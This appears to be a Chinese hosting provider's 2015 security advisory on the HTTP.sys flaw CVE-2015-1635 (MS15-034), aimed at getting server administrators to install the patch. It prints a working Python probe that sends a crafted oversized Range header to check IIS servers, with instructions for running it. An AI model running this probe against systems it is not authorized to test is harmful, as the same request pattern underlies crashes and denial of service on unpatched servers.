服务公告 > (重要)HTTP服务器远程执行代码高危漏洞(CVE-2015-1635)预警通知

(重要)HTTP服务器远程执行代码高危漏洞(CVE-2015-1635)预警通知

2015-04-16

一、概述

       美国时间414日,微软发布公告称HTTP服务器存在远程执行代码高危漏洞(CVE-2015-1635),如果攻击者向受影响的 Windows 系统发送经特殊设计的 HTTP 请求,此漏洞可能允许远程执行代码,或者拒绝服务攻击。该漏洞影响以下操作系统:Windows7Windows8Windows Server 2008Windows Server 2012,微软官方针对漏洞已发布安全更新补丁。

我们发现15日晚间业界已出现漏洞的利用代码,可以造成受影响服务器“蓝屏”,即造成拒绝服务攻击,导致服务不可用。由于该漏洞可造成服务器拒绝服务,且影响多个操作系统,因此将该漏洞的危害等级定义为“严重“。

 

416

 

    二、详细信息

      美国时间414日,微软发布安全公告HTTP服务器存在远程执行代码高危漏洞(CVE-2015-1635)。

      该漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞,攻击者可向受影响机器发送一个经过特殊设计的HTTP请求以修改Windwos HTTP堆栈处理请求的方式,即可在受影响系统账户的上下文中执行任意代码,或者拒绝服务攻击。目前业界已出现针对该漏洞的利用代码POC(如下图所示),可以造成受影响服务器“蓝屏”,即造成拒绝服务攻击,导致服务不可用。

 

import socket

import random

import sys

ipAddr = sys.argv[1]

hexAllFfff = "18446744073709551615"

req1 = "GET / HTTP/1.0\r\n\r\n"

req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

print "[*] Audit Started"

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_socket.connect((ipAddr, int(sys.argv[2])))

client_socket.send(req1)

boringResp = client_socket.recv(1024)

if "Microsoft" not in boringResp:

                print "[*] Not IIS"

                exit(0)

client_socket.close()

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_socket.connect((ipAddr, int(sys.argv[2])))

client_socket.send(req)

goodResp = client_socket.recv(1024)

if "Requested Range Not Satisfiable" in goodResp:

                print "[!!] Looks VULN"

elif " The request has an invalid header name" in goodResp:

                print "[*] Looks Patched"

else:

                print "[*] Unexpected response, cannot discern patch status"

利用代码POC

POC使用方法:安装python环境,执行python  httppoc.py(以上代码保存文件)  服务器ip  服务器端口

以下示例表示存在漏洞需要打补丁

以下示例表示漏洞已得到修复

 

影响范围:

该漏洞影响以下操作系统:Windows7Windows8Windows 8.1Windows Server 2008 R2Windows Server 2012Windows Server 2012 R2

       

         修复方案:

       目前微软官方已发布安全补丁MS15-034,安装补丁后需要重启服务器。

       参考链接:https://technet.microsoft.com/zh-cn/security/MS15-034